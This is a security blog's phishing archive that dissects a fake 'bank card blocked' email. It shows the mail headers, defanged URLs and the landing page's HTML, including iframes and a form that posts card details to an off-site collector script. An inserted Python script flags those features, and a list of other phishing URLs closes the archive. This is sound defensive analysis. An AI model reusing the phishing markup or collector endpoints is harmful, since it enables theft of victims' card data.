Category Archives: Phishing

Phishing: Urgent – Your bank card has been blocked

A user has reported a suspicious email to us:


Headers:

Received: from sds-16.hosteur.com (sds-16.hosteur.com [217.16.9.166])
Received: from www-data by sds-16.hosteur.com with local (Exim 4.69)
Subject: URGENT - Your bank card has been blocked
From: Banking Service <bankservice@service.fr >
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Sender: www-data <www-data@hosteur.com>

The clickable link “Access to your form” redirects to a new (suspicious) URL:

hxxp://servicevbv.us. tf/


URLVoid report:
http://www.urlvoid.com/scan/servicevbv.us.tf

Report: 2011-04-07 16:38:44 (GMT 1)
Website: servicevbv.us.tf
Domain Hash: 91fa19172a89f4c10b8dc0ca8b0460ec
IP Address: 188.40.70.27
IP Hostname: static.27.70.40.188.clients.your-server.de
IP Country: DE (Germany)
AS Number: 24940
AS Name: HETZNER-AS Hetzner Online AG RZ
Detections: 2 / 22 (9 %)
Status: SUSPICIOUS

Analyzing the URL content, we can see suspicious code:

<title>service verified by visa</title>
<link href="/zzz/css.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/zzz/gas.js"></script>
<script language="JavaScript" src="/zzz/init.php?D=c2VydmljZXZidi51cy50Zg%3D%3D&L=" type="text/javascript"></script>
<iframe src="hxxp://www.adboost.com/index6.php" frameborder="0" width="486px" height="60px" ></iframe>
<iframe src="hxxp://krystalweb.co.uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php" name="fid1" id="fid1" width="100%" height="100%" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<a href="servicevbv.us.tf">service verified by visa</a>

Why suspicious?

1) The page title looks like a scam.
2) Why is the CSS stylesheet located in the directory “/zzz/css.css”?
3) Why is the Google Analytics (?) code located in the directory “/zzz/gas.js”?
4) Why is there an iframe pointing to adboost. com/index6.php?
5) Why is there another iframe pointing to the (long URL) krystalweb. co. uk?
6) Where is SSL?

The long URL:

hxxp://krystalweb.co. uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php

loads the fake form in which the user is asked to enter their card details. The form then sends (POST) those details to another script, hosted at yet another (suspicious) URL:

action="hxxp://shopkasa.com. br/cgi-bin/CobreBemECommerceDados/HiTman2.php" method=post>

URLVoid analysis:
http://www.urlvoid.com/scan/shopkasa.com.br
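The checks made by hand above (third-party iframes, the base64-encoded host passed to /zzz/init.php, a form that posts off-site, no SSL) can be scripted when triaging a captured phishing page. This is an added example, not code from the post: the sample HTML is constructed from the snippet quoted above with hxxp restored to http, and the indicator wording is my own.

```python
import base64
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit
PAGE_HOST = "servicevbv.us.tf"  # host the victim was sent to
# Constructed sample modelled on the snippet quoted in the post (hxxp -> http).
SAMPLE_HTML = """<title>service verified by visa</title>
<script src="/zzz/init.php?D=c2VydmljZXZidi51cy50Zg%3D%3D&L="></script>
<iframe src="http://www.adboost.com/index6.php"></iframe>
<iframe src="http://krystalweb.co.uk/suuport/5454SDF8541/update.php"></iframe>
<form action="http://shopkasa.com.br/cgi-bin/HiTman2.php" method=post>"""

class _Tags(HTMLParser):
    # Collect (tag, attribute dict) for every element that points somewhere.
    def __init__(self):
        super().__init__()
        self.found = []
    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "script", "link", "form"):
            self.found.append((tag, dict(attrs)))

def _query_encodes_host(query, host):
    # /zzz/init.php?D=... carries the landing host base64-encoded; detect that pattern.
    for v in sum(parse_qs(query).values(), []):
        try:
            if base64.b64decode(v, validate=True).decode() == host:
                return True
        except ValueError:  # not valid base64, or not text
            pass
    return False

def triage(html, page_host):
    # Sorted indicator strings for a captured page; an empty list means nothing stood out.
    p = _Tags()
    p.feed(html)
    found = set()
    for tag, a in p.found:
        url = a.get("action") if tag == "form" else (a.get("src") or a.get("href"))
        u = urlsplit(url or "")
        if tag == "form":
            if u.hostname and u.hostname != page_host:
                found.add(f"form posts credentials to off-site host {u.hostname}")
            if u.scheme == "http":
                found.add("form submits over plain http (no SSL)")
        else:
            if u.hostname and u.hostname != page_host:
                found.add(f"{tag} loads content from third-party host {u.hostname}")
            if _query_encodes_host(u.query, page_host):
                found.add(f"{tag} carries the page host base64-encoded in its query")
    return sorted(found)
```

Run against a saved copy of the page (never a live visit from an unprotected workstation) it gives the analyst the same list of oddities the post walks through.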

Recent Phishing Emails Against Banks and CartaSi

Here are a few recent malicious links reported as phishing pages:

Phishing Page

merklin-baiersbronn. de/components/com_mailto/Bankline.php
mooyekindmakelaars. nl/components/com_contact/Bankline.php
linebanks.dominiotemporario. com/inTerneT/nett/
mellylog.altervista. org/templates/beez/REAL.php
mellylog.altervista. org/templates/beez/Santander.php
163.30.82.2 /~user/www.cartasi.it/index.html
66.7.192.115 /~account/CaraSi.it/gtwpages/index.php?id=
organamattress.com /www/bancodesio/index.html


URLVoid reports:

Website                           IP Address        IP Hostname
merklin-baiersbronn. de           81.169.145.158
mooyekindmakelaars. nl            77.94.248.181
linebanks.dominiotemporario. com  187.17.98.37
mellylog.altervista. org          –                 –
163.30.82.2
66.7.192.115                      –                 bored1.reallybored.net
organamattress. com               67.15.55.238